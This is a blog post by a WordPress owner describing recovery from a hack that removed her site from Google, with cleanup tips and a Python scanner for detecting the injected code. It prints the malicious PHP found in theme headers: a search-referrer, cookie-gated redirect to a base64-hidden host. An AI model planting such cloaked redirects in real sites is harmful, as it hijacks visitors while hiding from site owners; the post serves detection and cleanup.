Google Status Restored! The WordPress Hack Aftermath
After help from numerous resources online (scroll to the bottom of Busted by Google to see some of the sites that helped me track down my hacked files), and combing through jillions (it feels like) of files, I find this morning that my Google search engine results are restored to normal. That was REALLY fast.
Though I use Google’s Webmaster Tools regularly (which is where one finds messages from Google about misbehaving sites), I never did hear from Google in writing about the issue. I just noticed that I was gone from the SERPs, practically overnight, and traffic was way down, which are classic symptoms of this latest round of hacks.
I presume that Google is way overloaded dealing with these issues, and that they conveyed their, uh, concern for my site by removing me from the SERPs in the first place.
If you think you may have been hacked, or if you haven’t and want to make sure you aren’t, here are some things to look out for:
Has your blog vanished from the search engine listings and your traffic fallen off tremendously?
I had some medical issues which kept me occupied and away from my blog for a while. I naively concluded I just needed to write more to build my numbers back up. Don’t make that assumption. Start looking at Google’s cached version of your site and you may be in for an unpleasant surprise.
Patting yourself on the back for running the latest version of WordPress?
Even though you may be running the latest version of WP, you may have been infected prior to upgrading and not know it. I upgraded on May 29 to WP 2.5.1; I think I was hacked on 4/25, and those nasty files clung to my site files during the upgrade. You have to remove them manually.
Losing Focus.
In the midst of searching for and carving out compromised files, I read some discussions on Google’s definition of duplicate content. Probably not a good idea to start tackling other issues in the midst of the hack abatement, but not thinking clearly, I sped off in that direction.
I revamped the way WordPress displays my page content to make certain I wasn’t violating that guideline, quickly building a new freestanding index page from instructions I found in the WordPress codex and at dailyblogtips.com (thanks to a tip from a fellow IVAA member, Laura Nieberding. Thanks, Laura!).
Right after putting the finishing touches on that and patting myself on the back for taking measures NOT to display duplicate page content, I returned to hack abatement.
The next tip I read about concerned base64 code and cookie checks that might be installed in the head area of infected WordPress theme files. I had already checked for those and, at THAT point, wasn’t affected.
But wait a minute…
To build my new archives page, I had just grabbed two files from one of the default theme folders in my Themes folder, since my own theme didn’t include those files.
Horrifyingly, I opened those files up and there was the base64 and cookie redirection malicious code, embedded at the top of the header code. Here’s the code you are looking for (thanks to bloggerguide.net):
```php
<?php
// Search-engine names the injected code looks for in the visitor's referrer.
$seref = array('google', 'msn', 'live', 'altavista',
               'ask', 'yahoo', 'aol', 'cnn', 'weather', 'alexa');
$ser = 0;
foreach ($seref as $ref) {
    if (strpos(strtolower($_SERVER['HTTP_REFERER']), $ref) !== false) {
        $ser = '1';
        break;
    }
}
// Only visitors arriving from a search engine with no cookies yet (a first visit,
// not the blog owner) get redirected, so the owner never sees it happen. The
// redirect host is hidden as base64 so a plain-text search for the domain finds nothing.
if ($ser == '1' && sizeof($_COOKIE) == 0) {
    header('Location: http://' . base64_decode('YW55cmVzdWx0cy5uZXQ=') . '/');
    exit;
}
?>
```
In ignorance, I presumed that these default themes were installed (or installed over the top of previous versions) when I upgraded to 2.5.1. So I sliced that out, and continued down the list.
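As an added example (not the blog’s own code, and not from bloggerguide.net), here is a small Python scanner that looks for the combination shown above: a referrer check, an empty-cookie test, a Location header, and a base64_decode() call. It also decodes the base64 literal so you can see where the redirect goes. The sample files it ships with are constructed, and the hidden host in them is a placeholder.

```python
import base64
import os
import re

# Indicators from the injected snippet above: a referrer check for search-engine
# names, an empty-cookie test, and a header() redirect hidden behind base64_decode().
INDICATORS = {
    "referer_check": re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_REFERER['\"]\s*\]"),
    "cookie_check": re.compile(r"(sizeof|count)\s*\(\s*\$_COOKIE\s*\)"),
    "location_redirect": re.compile(r"header\s*\(\s*['\"]Location:", re.IGNORECASE),
    "base64_decode": re.compile(r"base64_decode\s*\("),
}
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

def decode_targets(source):
    """Decode each base64 literal fed to base64_decode() so the hidden host is readable."""
    out = []
    for lit in B64_LITERAL.findall(source):
        try:
            out.append(base64.b64decode(lit, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            out.append("<undecodable>")
    return out

def scan_source(source):
    """Return (indicator names found, decoded base64 targets) for one PHP source string."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
    return hits, decode_targets(source)

def scan_theme_dir(root):
    """Walk a themes tree; report PHP files with two or more indicators (one alone can be legitimate)."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits, targets = scan_source(fh.read())
                if len(hits) >= 2:
                    findings[os.path.relpath(path, root)] = (hits, targets)
    return findings

# Constructed sample files (not from the blog): the hidden host is a placeholder.
_HOST = base64.b64encode(b"example.invalid").decode()
SAMPLE_FILES = {
    "default/header.php": "<?php if(strpos(strtolower($_SERVER['HTTP_REFERER']),'google')!==false"
                          " && sizeof($_COOKIE)==0){ header('Location: http://'.base64_decode('"
                          + _HOST + "').'/'); exit; } ?>\n<html><head>",
    "mytheme/header.php": "<?php wp_head(); ?>\n<html><head>",
}
```

Point scan_theme_dir() at your wp-content/themes folder, including the default themes you never activated, since that is where the files above turned up.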
Be sure to notify Google of your efforts to remove offending code.
I wrote three separate “Request for Reconsideration” notes to Google, as I discovered more and made more inroads in digging out the offending code. Maybe overkill but I wanted to let them know I was working as hard as I could at eradicating that crap.
Report hidden code spam.
Google has a form you can use to report spammers, including those who employ hidden code, hidden links, and redirects. If someone embedded these in your site, find the embedded links and report them; the form lets you list any offending web site that may have embedded code in your site via a redirection. I sliced out an example of the hidden links, showing where they were redirecting to, in case that helped Google amass info on how these hacks are being accomplished.
I am not skilled in PHP, and am an average-or-below user of CSS. I do not want to be an expert in hack abatement. Also, because I am a Mac user, I am largely inexperienced in dealing with hacks and viruses, etc.
What should others like me do about running blogs, in view of the risk management and damage control that blogging seems to require nowadays?
Pingback // August 26th, 2008 // 10:41 am
[...] to updating to a newer, more stable version, you may bring the infection with you unwittingly. Read more about the aftermath of a hack and how to clean up your files here and [...]